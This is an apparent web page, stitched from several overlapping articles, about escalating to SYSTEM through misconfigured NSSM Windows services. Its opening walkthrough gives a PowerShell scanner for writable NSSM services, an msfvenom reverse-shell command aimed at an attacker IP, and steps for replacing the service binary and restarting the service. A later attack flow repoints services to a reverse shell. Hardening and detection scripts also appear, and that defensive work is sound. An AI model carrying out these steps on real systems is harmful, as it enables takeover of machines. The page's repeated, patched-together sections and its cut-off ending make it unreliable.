
Nssm224 Privilege Escalation Updated Site

This guide outlines how to identify and exploit misconfigurations in the Non-Sucking Service Manager (NSSM), often referred to as "nssm224" (a reference to the long-standing 2.24 release), to elevate privileges from a standard user to SYSTEM on Windows.

1. Understanding the Vulnerability

NSSM wraps arbitrary executables as Windows services. Privilege escalation becomes possible when a service runs as LocalSystem but either nssm.exe itself or the program it wraps (recorded in the registry under the service's Parameters\Application value) can be modified by a low-privileged user.

Common Misconfigurations:

Unquoted Service Paths: The service ImagePath contains spaces and is not quoted, so the Service Control Manager tries each space-delimited prefix (for example C:\Program.exe) before the real binary; an attacker who can write to one of those parent directories gets code execution as the service account.

Weak File Permissions: The executable or its directory grants write access (W, M or F in icacls output) to Everyone, Authenticated Users or the Users group.

2. Enumeration (Finding the Target)

First, identify services managed by NSSM that run as SYSTEM and have weak permissions. Use the command prompt or PowerShell.

List Service Details:

  wmic service get name,displayname,pathname,startmode | findstr /i "auto"

wmic is deprecated on current Windows builds; Get-CimInstance Win32_Service returns the same fields. An NSSM-managed service shows nssm.exe (or nssm_x64.exe) as its pathname, and the program it actually launches is stored separately in the registry under HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>\Parameters\Application, so both paths need checking.

Check Permissions on Executables: Use icacls to check whether your user has write access to the service binary, the wrapped application, and the directories containing them (the directories matter for the unquoted-path case).

  icacls "C:\Path\To\Service\Binary.exe"

Look for (F) (Full Access), (M) (Modify) or (W) (Write) granted to Everyone, Authenticated Users or the Users group.

3. Exploitation Steps (Updated Approach)

Once a vulnerable service is found, follow these steps:
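The steps below assume the vulnerable service has already been found. The manual enumeration above checks one path at a time; the following PowerShell script is an added example written for this page (it is not code from the original guide or from the NSSM project) that does the whole pass in one go: it lists services whose ImagePath is an nssm binary, resolves the wrapped program from the registry, and reports every file or directory in that chain that Everyone, Authenticated Users, Users or INTERACTIVE can write, plus any unquoted ImagePath. It assumes NSSM 2.24 records the wrapped program in Parameters\Application; reading ACLs needs only READ_CONTROL, so it runs from a standard user shell.

```powershell
# Added example for this page, not code from the guide or from NSSM.
# Assumption: the wrapped program lives in the registry value
# HKLM\SYSTEM\CurrentControlSet\Services\<Name>\Parameters\Application (NSSM 2.24 layout).

$LowPrivSids = @(
    'S-1-1-0',       # Everyone
    'S-1-5-11',      # Authenticated Users
    'S-1-5-32-545',  # BUILTIN\Users
    'S-1-5-4'        # INTERACTIVE
)

# Rights that let the holder replace, modify or delete the target; icacls shows
# them as (F), (M), (W), (D) or as WD/AD inside a "special" ACE.
$WriteMask = [int](
    [System.Security.AccessControl.FileSystemRights]::Write -bor
    [System.Security.AccessControl.FileSystemRights]::Modify -bor
    [System.Security.AccessControl.FileSystemRights]::FullControl -bor
    [System.Security.AccessControl.FileSystemRights]::Delete -bor
    [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
    [System.Security.AccessControl.FileSystemRights]::ChangePermissions)
$GenericWriteBits = 0x50000000   # GENERIC_WRITE | GENERIC_ALL, present on some raw ACEs

function Get-LowPrivWriteAccess {
    # Returns "trustee : rights" for the first dangerous Allow ACE on $Path, or $null.
    param([string]$Path)
    # A missing target is reported through its parent directory instead.
    if ([string]::IsNullOrWhiteSpace($Path) -or -not (Test-Path -LiteralPath $Path)) { return $null }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $null }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }                                   # orphaned or untranslatable SID
        if ($LowPrivSids -notcontains $sid) { continue }
        $rights = [int]$ace.FileSystemRights
        if (($rights -band $WriteMask) -ne 0 -or ($rights -band $GenericWriteBits) -ne 0) {
            return "$($ace.IdentityReference) : $($ace.FileSystemRights)"
        }
    }
    return $null
}

function Get-ImageExe {
    # Extracts the executable from a service ImagePath, quoted or not.
    param([string]$ImagePath)
    if ($ImagePath -match '^"([^"]+)"') { return $Matches[1] }
    return ($ImagePath -replace '^(.*?\.exe).*$', '$1')
}

function Find-WeakNssmServices {
    foreach ($svc in Get-CimInstance Win32_Service) {
        if ($svc.PathName -notmatch 'nssm[^\\]*\.exe') { continue }   # nssm.exe, nssm_x64.exe, ...
        $nssmExe = Get-ImageExe -ImagePath $svc.PathName
        $params  = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)\Parameters" -ErrorAction SilentlyContinue
        $targets = [ordered]@{ 'nssm.exe' = $nssmExe; 'nssm directory' = (Split-Path $nssmExe -Parent) }
        if ($params -and $params.Application) {
            $targets['Application']           = $params.Application
            $targets['Application directory'] = Split-Path $params.Application -Parent
        }
        foreach ($entry in $targets.GetEnumerator()) {
            $hit = Get-LowPrivWriteAccess -Path $entry.Value
            if ($hit) {
                [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; What = $entry.Key; Path = $entry.Value; Writable = $hit }
            }
        }
        # Unquoted ImagePath with spaces: the SCM tries each space-delimited prefix
        # (C:\Program.exe, C:\Program Files\nssm.exe, ...) before the real binary.
        if ($svc.PathName -notmatch '^"' -and $nssmExe -match ' ') {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; What = 'unquoted ImagePath'; Path = $svc.PathName; Writable = 'check each parent directory' }
        }
    }
}

Find-WeakNssmServices | Format-Table -AutoSize
```

Every row in the output is a candidate: RunsAs tells you what you would gain (LocalSystem is the interesting case), What and Path tell you which file to replace or which directory prefix to plant in. The script matches on SIDs rather than names so it behaves the same on non-English installs.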

Create a Malicious Payload: Generate a reverse shell with msfvenom, or a small executable that adds a user to the local Administrators group. A plain -f exe payload is not a real service: the SCM terminates it roughly 30 seconds after start for never reporting in, so either use -f exe-service or have the payload spawn its work in a child process.

  msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker IP> LPORT=<port> -f exe -o service.exe

Replace the Service Binary: Move the legitimate executable aside and put your payload in its place. For an NSSM service this can be nssm.exe itself or the program recorded in Parameters\Application, whichever is writable; for an unquoted path, place the payload at the hijackable prefix instead.

  move "C:\Path\To\Service\Binary.exe" "C:\Path\To\Service\Binary.exe.bak"
  copy "C:\Temp\service.exe" "C:\Path\To\Service\Binary.exe"

Restart the Service: If your account has SERVICE_STOP and SERVICE_START rights on the service, restart it; if not, wait for a system reboot.

  sc stop <ServiceName>
  sc start <ServiceName>

Obtain Shell: Catch the reverse shell as NT AUTHORITY\SYSTEM.

4. Prevention and Mitigation

Quote Service Paths: Enclose every service ImagePath that contains spaces in double quotes (sc config <ServiceName> binPath= "..."), so no space-delimited prefix can be hijacked.

Restrict Permissions: Apply the principle of least privilege. Only SYSTEM and Administrators should be able to write nssm.exe, the wrapped application, the directories containing them, and the service's registry key.

Update NSSM: Run the current NSSM release, but note that the vector described here is a deployment and permissions problem rather than a bug in a particular nssm.exe build; a freshly updated binary dropped into a Users-writable directory is exactly as exploitable as "nssm224".


The Persistent Risk of NSSM: Understanding Privilege Escalation in Service Management

The Non-Sucking Service Manager (NSSM) is a popular open-source utility used by administrators to wrap any executable into a Windows service. While it is valued for its simplicity and robustness, its role as a "service helper" has made it a frequent target for local privilege escalation (LPE) attacks. Recent updates and advisories, such as CVE-2025-41686, highlight that the vulnerability often lies not in NSSM's core code but in how third-party software installers deploy and configure it.

The Anatomy of the Vulnerability

Privilege escalation via NSSM typically involves improper permissions (CWE-276, Incorrect Default Permissions, or CWE-732, Incorrect Permission Assignment for Critical Resource). Because Windows services often run with SYSTEM or administrative privileges, the binaries associated with them are highly sensitive. If an installer places nssm.exe in a directory where a standard, low-privileged user has Write or Modify permissions, that user can replace the legitimate binary with a malicious one.

When the system restarts or the service is cycled, the Windows Service Control Manager (SCM) executes the attacker's file instead of the original NSSM utility. Because the service was configured to run as SYSTEM, the attacker's code inherits those maximum-level permissions, effectively granting full control over the machine.

Recent Developments and Impact

In late 2025 and early 2026, researchers identified that multiple enterprise products, including Phoenix Contact Device and Update Management and Wowza Streaming Engine, were vulnerable to this exact pattern:

CVE-2025-41686: A high-severity flaw (CVSS 7.8) where improper permissions on nssm.exe allowed low-privileged local attackers to gain administrative access.

CVE-2016-20033 (Updated 2026): Continued updates to older vulnerabilities in Wowza Streaming Engine showed that the "Everyone" group was still being granted full access to nssm_x64.exe in certain configurations.

These vulnerabilities are particularly dangerous because they require no user interaction. Once an attacker has gained a foothold on a system through a low-privileged account (e.g., via phishing or another exploit), they can use these misconfigured services to escalate to SYSTEM on that host and from there compromise the wider infrastructure.

Mitigation and Best Practices

The primary defense against NSSM-related privilege escalation is the Principle of Least Privilege: only SYSTEM and administrators should be able to write the NSSM binary, the application it wraps, and the service configuration.

The Non-Sucking Service Manager (nssm.exe) version 2.24 has been identified as a vector for local privilege escalation (LPE) in several recent security advisories (Phoenix Contact among them), typically because of improper file system permissions on the binary as shipped by third-party installers.

The "Create a Feature" Exploit Mechanism

In the context of privilege escalation, "creating a feature" refers to an attacker abusing the core functionality of NSSM, its ability to install and manage Windows services, to execute malicious code with higher-level permissions (e.g., NT AUTHORITY\SYSTEM). Key exploit methods include:

Binary Replacement (Service Sideloading): If the directory containing nssm.exe or the service executable it wraps has weak permissions (e.g., "Everyone" has "Full Control"), an attacker can replace the legitimate binary with a malicious one. When the service restarts, the malicious code runs as a privileged service.

Service Configuration Hijacking: Using nssm install <ServiceName> <program> or nssm set <ServiceName> AppParameters <arguments>, an attacker with sufficient local rights (write access to the service's registry key, or SERVICE_CHANGE_CONFIG on the service itself) can redirect a service to execute their own scripts or payloads instead of the intended application.

Interactive Shell Creation: A common technique involves setting the service type to SERVICE_INTERACTIVE_PROCESS (nssm set <ServiceName> Type SERVICE_INTERACTIVE_PROCESS). If the service runs as LocalSystem, it can potentially allow an attacker to interact with a system-level desktop. On supported Windows versions this is largely theoretical: session 0 isolation (Windows Vista onward) keeps services off the user's desktop, and Windows 10 and later no longer support interactive services at all.

Vulnerability Chaining: Advanced attackers, such as the Akira ransomware group, use NSSM 2.24 to create persistent malicious services named "sysmon" or "edge.exe" that launch tunneling tools for remote access.

Recent Vulnerability: CVE-2025-41686

A high-severity flaw (CVE-2025-41686) was discovered in 2025 affecting various products that bundle nssm.exe. It allows low-privileged local attackers to exploit improper permissions to gain full administrative access by manipulating the file and executing malicious commands (source: certvde.com).

Recommended Mitigation:

Ensure that the nssm.exe binary and the directories it resides in are protected by strict Access Control Lists (ACLs), allowing only administrators write access.

Update any software bundling NSSM to the fixed versions published by the vendor (e.g., Phoenix Contact DaUM).

Monitor for unusual service creation events (System log Event ID 7045, and Security log Event ID 4697 where that auditing is enabled) and for changes to service configurations under HKLM\SYSTEM\CurrentControlSet\Services.
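The prevention list in the first part of this page (quote service paths, restrict permissions, keep NSSM current) and the Recommended Mitigation list above describe the same three controls. The following PowerShell is an added example for this page, not code from the guide, from NSSM or from any vendor advisory, that applies them to one deployment and then checks the System log for service installs referencing nssm. It assumes nssm.exe is installed under C:\Program Files\nssm and the service is called MyApp; both are hypothetical and must be adjusted. Run it from an elevated prompt.

```powershell
# Added example for this page; the directory and service name below are hypothetical.
$NssmDir = 'C:\Program Files\nssm'
$SvcName = 'MyApp'

# 1. Reset the ACL on the NSSM directory tree. First put every child back to
#    inherited-only ACEs, then give the root an explicit ACL that children inherit:
#    SYSTEM and Administrators full control, Users read+execute, nothing for
#    Everyone or Authenticated Users. SIDs (*S-...) keep this locale-independent.
icacls $NssmDir /reset /T /C
icacls $NssmDir /inheritance:r /grant:r '*S-1-5-18:(OI)(CI)F' '*S-1-5-32-544:(OI)(CI)F' '*S-1-5-32-545:(OI)(CI)RX'
icacls $NssmDir /remove:g '*S-1-1-0' '*S-1-5-11' /T /C

# 2. Make sure the service ImagePath is quoted so that no space-delimited prefix
#    (C:\Program.exe, ...) is ever tried before nssm.exe.
$svc = Get-CimInstance Win32_Service -Filter "Name='$SvcName'"
if ($svc -and $svc.PathName -notmatch '^"' -and $svc.PathName -match ' ') {
    $exe  = $svc.PathName -replace '^(.*?\.exe).*$', '$1'   # path up to the executable
    $tail = $svc.PathName.Substring($exe.Length)            # arguments, e.g. the NSSM service name
    sc.exe config $SvcName binPath= "`"$exe`"$tail"
}

# 3. Look back 30 days for service installations (Service Control Manager 7045)
#    whose image path mentions nssm; properties are ServiceName, ImagePath,
#    ServiceType, StartType, AccountName in that order.
Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddDays(-30) } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'nssm' } |
    Select-Object TimeCreated,
        @{ n = 'Service';   e = { $_.Properties[0].Value } },
        @{ n = 'ImagePath'; e = { $_.Properties[1].Value } },
        @{ n = 'Account';   e = { $_.Properties[4].Value } } |
    Format-Table -AutoSize
```

Step 1 is deliberately two-phase: /reset alone would leave the children inheriting whatever the root had, and /inheritance:r alone on the root would leave stale explicit ACEs (such as an installer's Everyone:F) on the files underneath. Step 3 only covers the install event; the follow-up sc config or nssm set changes described in this section land in the service's registry key, so pair it with registry auditing on HKLM\SYSTEM\CurrentControlSet\Services if you need to catch reconfiguration as well.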


Core Problem (Pre-Update)

Despite the "pre-update" label, this is not a defect that a newer nssm.exe removes: the same steps work against any service, NSSM-managed or not, whose binary or configuration a low-privileged user is allowed to change. The attack flow looks like this:

  1. Enumerate writable service configuration – Find a service whose ImagePath (or, for NSSM services, whose Parameters\Application value) points to a user-writable location, or whose DACL grants the user SERVICE_CHANGE_CONFIG.
  2. Repoint the service – Run nssm set <ServiceName> Application <path> (or nssm edit <ServiceName> for the GUI) and point Application at cmd.exe or a reverse shell. nssm set writes to HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>\Parameters, so it needs write access to that key; sc config <ServiceName> binPath= <path> does the equivalent through the SCM and needs only SERVICE_CHANGE_CONFIG on the service.
  3. Restart the service – The new binary executes with the service's existing privileges (often SYSTEM or LOCAL SERVICE).

NSSM adds no privilege of its own here. Service configuration changes go either through ChangeServiceConfig, which the SCM authorizes against the service's DACL, or through the service's registry key, which by default only SYSTEM and Administrators can write; neither path involves UAC, and neither the SCM nor NSSM checks whether the binary being pointed at is trustworthy. What NSSM removes is operational friction: a user who already holds those rights can wrap an arbitrary program as a service in a single command.
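The Service Configuration Hijacking method above and the attack flow just described both hinge on one of two permissions: SERVICE_CHANGE_CONFIG on the service (what sc config needs) or write access to the service's Parameters registry key (what nssm set modifies). The following PowerShell, an added example written for this page rather than code from the guide or from NSSM, checks both for every NSSM-wrapped service. It assumes sc.exe sdshow prints the service security descriptor as a single SDDL line and that NSSM keeps its settings under HKLM\SYSTEM\CurrentControlSet\Services\<Name>\Parameters.

```powershell
# Added example for this page; not code from the guide or from the NSSM project.

# SDDL aliases and raw SIDs that every standard user is a member of
$LowPrivTrustees = @('WD', 'AU', 'BU', 'IU', 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4')
# Two-letter SDDL rights that allow reconfiguring the service or rewriting its DACL:
# DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC, WO = WRITE_OWNER, GA/GW = GENERIC_ALL/GENERIC_WRITE
$DangerousCodes = @('DC', 'WD', 'WO', 'GA', 'GW')
$DangerousMask  = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Get-ServiceConfigWriters {
    # One object per Allow ACE in the service DACL that gives a low-privileged trustee dangerous rights.
    param([Parameter(Mandatory)][string]$Name)
    $sddl = (sc.exe sdshow $Name | Where-Object { $_ -match '^D:' }) -join ''
    if (-not $sddl) { throw "Could not read the security descriptor of service '$Name'" }
    $sacl = $sddl.IndexOf('S:(')                         # drop the audit ACL, if present
    if ($sacl -ge 0) { $sddl = $sddl.Substring(0, $sacl) }
    # Each ACE looks like (A;;CCLCSWRPWPDTLOCRRC;;;AU): type;flags;rights;;;trustee
    foreach ($m in [regex]::Matches($sddl, '\(A;[^;]*;([^;]*);[^;]*;[^;]*;([^)]+)\)')) {
        $rights  = $m.Groups[1].Value
        $trustee = $m.Groups[2].Value
        if ($LowPrivTrustees -notcontains $trustee) { continue }
        $bad = $false
        if ($rights -like '0x*') {
            $bad = ([Convert]::ToInt64($rights.Substring(2), 16) -band $DangerousMask) -ne 0
        } else {
            # Rights are concatenated two-letter codes; walk them in pairs so that
            # "SD" followed by "CC" is not misread as containing "DC".
            for ($i = 0; $i + 1 -lt $rights.Length; $i += 2) {
                if ($DangerousCodes -contains $rights.Substring($i, 2)) { $bad = $true; break }
            }
        }
        if ($bad) { [pscustomobject]@{ Service = $Name; Where = 'service DACL'; Trustee = $trustee; Rights = $rights } }
    }
}

function Get-ParametersKeyWriters {
    # Same question for the registry key that nssm set / nssm edit write to.
    param([Parameter(Mandatory)][string]$Name)
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name\Parameters"
    if (-not (Test-Path -LiteralPath $key)) { return }
    $lowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4')
    $writeMask = [int](
        [System.Security.AccessControl.RegistryRights]::SetValue -bor
        [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
        [System.Security.AccessControl.RegistryRights]::WriteKey -bor
        [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
        [System.Security.AccessControl.RegistryRights]::FullControl)
    foreach ($ace in (Get-Acl -LiteralPath $key).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($lowPrivSids -contains $sid -and (([int]$ace.RegistryRights -band $writeMask) -ne 0)) {
            [pscustomobject]@{ Service = $Name; Where = $key; Trustee = "$($ace.IdentityReference)"; Rights = "$($ace.RegistryRights)" }
        }
    }
}

# Check every NSSM-wrapped service (Win32_Service.PathName is the ImagePath)
Get-CimInstance Win32_Service |
    Where-Object { $_.PathName -match 'nssm[^\\]*\.exe' } |
    ForEach-Object { Get-ServiceConfigWriters -Name $_.Name; Get-ParametersKeyWriters -Name $_.Name } |
    Format-Table -AutoSize
```

A hit in the service DACL means sc config works without NSSM at all; a hit on the Parameters key is the one that makes nssm set usable from a standard account. A clean result from both, combined with non-writable binaries, is what closes the attack flow above.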


The Bottom Line: Legacy Tools, Persistent Risks

The nssm224 privilege escalation updated keyword is not just SEO bait: it represents a real, decade-old attack vector that refuses to die. As long as administrators copy-paste outdated tutorials that install nssm without hardening its file and service ACLs, this vector will remain in Windows environments.

For defenders: Audit all NSSM services today, enforce quoted paths, and restrict both file and service ACLs. For researchers: Look into NSSM's newer 2.24.3 unofficial builds; some reintroduced insecure temporary file creation.

NSSM is still a great tool. But like any powerful utility, with great power comes great responsibility—and a potential privilege escalation path to SYSTEM.


Updated Exploitation Techniques (2025 Perspective)

Penetration testers have refined the nssm224 attack chain. Here is the modern methodology:

NSSM 2.24 – Privilege Escalation Vector

NSSM allows a user to install and manage Windows services. When a low-privileged user has write access to an NSSM-controlled service's configuration (its Parameters registry key or, via SERVICE_CHANGE_CONFIG, the service itself) or to the binary it points at, privilege escalation becomes possible.